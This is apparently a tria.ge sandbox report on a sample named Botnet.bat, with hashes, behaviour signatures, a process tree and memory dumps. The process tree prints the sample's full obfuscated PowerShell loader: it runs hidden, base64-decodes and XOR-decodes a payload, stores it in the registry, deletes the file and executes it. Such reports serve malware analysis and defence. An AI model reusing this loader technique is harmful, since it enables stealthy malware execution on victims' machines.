Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    90s
  • max time network
    94s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240802-en
  • resource tags

    arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    12/08/2024, 10:13

General

  • Target

    Botnet/Botnet.bat

  • Size

    1.8MB

  • MD5

    40b83f775740cabe66634fa2c365cc20

  • SHA1

    9c4ad5d8e0376c743f96468093b8656ca2d84d4a

  • SHA256

    038b8a10585b6b8e81454d978fe4aabb22b28ea93a17b7b14aeaef66d3efac2c

  • SHA512

    5025429e59af940fca37ada795b925dccbb23bf7e35169bc95b20cc77be828a288621c8a0f184cf481eed1ee5bee473089c6d5b88728148e9f310cf69b7cd5a2

  • SSDEEP

    24576:2WZ5oeL8NVRVM+VjRl+H4bZBkhWlacFz66eFcI6mBevOnFOZqd9NnVPpWkX+C0kZ:2H3Rzghw7+6UrgvOFUeUdqb0q

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Botnet\Botnet.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -windowstyle hidden -c "Write-Host ('dedaoL rotcartxE llehsrewoP'[-1..-27] -join '');$path = $env:JjxMVMBNud;$path = $path.Trim();$path = $path.Substring(1, $path.Length - 2);Write-Host $path;$_1 = Get-Content -Path $path;$_3 = $_1 -split '\n';$_2 = $_3[-1];$_2 = [Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_2.Replace('\n', ''));$_4 = New-Object byte[] $_2.Length;for ($_5 = 0; $_5 -lt $_4.Length; $_5++) {$_4[$_5] = $_2[$_5] -bxor 0x20;};$_4 = [System.Text.Encoding]::Unicode.GetString($_4);Set-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows Search' -Name 'zLanIlbmlS' -Value $_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1984
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
    1⤵
      PID:3500
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
      1⤵
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:3804

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

      Filesize

      10KB

      MD5

      c3e08121cabb9380e3d50cadde97d53a

      SHA1

      0e666954e83e97e3883e52092fe2be88a520e8f8

      SHA256

      76e1d3ab7320c4b863adb091b5b77205d81e13eafb539a18ebe3d8ea46b29433

      SHA512

      9a6ef7710781d2f3a1f873129b21990548c1b275720080d87fe4051b464b0aef4ad8625656c388a65163563c6fb2086c29c01ba5f518c5b9679e7227fcc7941f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0kz1rdpp.5sn.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1984-2-0x00007FFE898F3000-0x00007FFE898F5000-memory.dmp

      Filesize

      8KB

    • memory/1984-11-0x000001552F6B0000-0x000001552F6D2000-memory.dmp

      Filesize

      136KB

    • memory/1984-12-0x00007FFE898F0000-0x00007FFE8A3B2000-memory.dmp

      Filesize

      10.8MB

    • memory/1984-13-0x00007FFE898F0000-0x00007FFE8A3B2000-memory.dmp

      Filesize

      10.8MB

    • memory/1984-14-0x00007FFE898F0000-0x00007FFE8A3B2000-memory.dmp

      Filesize

      10.8MB

    • memory/1984-17-0x00007FFE898F0000-0x00007FFE8A3B2000-memory.dmp

      Filesize

      10.8MB